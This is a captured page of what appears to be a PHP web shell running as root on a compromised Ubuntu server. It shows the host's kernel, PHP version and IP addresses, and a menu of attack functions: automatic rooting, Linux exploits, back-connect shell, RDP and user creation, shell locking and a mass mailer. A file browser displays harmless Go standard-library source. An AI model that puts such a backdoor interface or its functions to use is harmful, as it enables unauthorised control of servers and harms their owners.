Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
internal /
syscall /
unix /
[ HOME SHELL ]
Name
Size
Permission
Action
asm_aix_ppc64.s
320
B
-rw-r--r--
asm_solaris.s
321
B
-rw-r--r--
at.go
1.24
KB
-rw-r--r--
at_aix.go
428
B
-rw-r--r--
at_darwin.go
884
B
-rw-r--r--
at_freebsd.go
1.03
KB
-rw-r--r--
at_libc.go
1.43
KB
-rw-r--r--
at_solaris.go
581
B
-rw-r--r--
at_sysnum_darwin.go
235
B
-rw-r--r--
at_sysnum_dragonfly.go
394
B
-rw-r--r--
at_sysnum_fstatat64_linux.go
273
B
-rw-r--r--
at_sysnum_fstatat_linux.go
265
B
-rw-r--r--
at_sysnum_linux.go
350
B
-rw-r--r--
at_sysnum_netbsd.go
398
B
-rw-r--r--
at_sysnum_newfstatat_linux.go
296
B
-rw-r--r--
at_sysnum_openbsd.go
396
B
-rw-r--r--
fcntl_linux_32bit.go
417
B
-rw-r--r--
getentropy_openbsd.go
554
B
-rw-r--r--
getrandom_freebsd.go
1.11
KB
-rw-r--r--
getrandom_linux.go
1.16
KB
-rw-r--r--
getrandom_linux_386.go
284
B
-rw-r--r--
getrandom_linux_amd64.go
284
B
-rw-r--r--
getrandom_linux_arm.go
284
B
-rw-r--r--
getrandom_linux_generic.go
533
B
-rw-r--r--
getrandom_linux_mips64x.go
312
B
-rw-r--r--
getrandom_linux_mipsx.go
308
B
-rw-r--r--
getrandom_linux_ppc64x.go
309
B
-rw-r--r--
getrandom_linux_s390x.go
284
B
-rw-r--r--
ioctl_aix.go
672
B
-rw-r--r--
nonblocking.go
637
B
-rw-r--r--
nonblocking_js.go
270
B
-rw-r--r--
nonblocking_libc.go
563
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : at.go
// Copyright 2018 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build linux openbsd netbsd dragonfly package unix import ( "syscall" "unsafe" ) func Unlinkat(dirfd int, path string, flags int) error { var p *byte p, err := syscall.BytePtrFromString(path) if err != nil { return err } _, _, errno := syscall.Syscall(unlinkatTrap, uintptr(dirfd), uintptr(unsafe.Pointer(p)), uintptr(flags)) if errno != 0 { return errno } return nil } func Openat(dirfd int, path string, flags int, perm uint32) (int, error) { var p *byte p, err := syscall.BytePtrFromString(path) if err != nil { return 0, err } fd, _, errno := syscall.Syscall6(openatTrap, uintptr(dirfd), uintptr(unsafe.Pointer(p)), uintptr(flags), uintptr(perm), 0, 0) if errno != 0 { return 0, errno } return int(fd), nil } func Fstatat(dirfd int, path string, stat *syscall.Stat_t, flags int) error { var p *byte p, err := syscall.BytePtrFromString(path) if err != nil { return err } _, _, errno := syscall.Syscall6(fstatatTrap, uintptr(dirfd), uintptr(unsafe.Pointer(p)), uintptr(unsafe.Pointer(stat)), uintptr(flags), 0, 0) if errno != 0 { return errno } return nil }
Close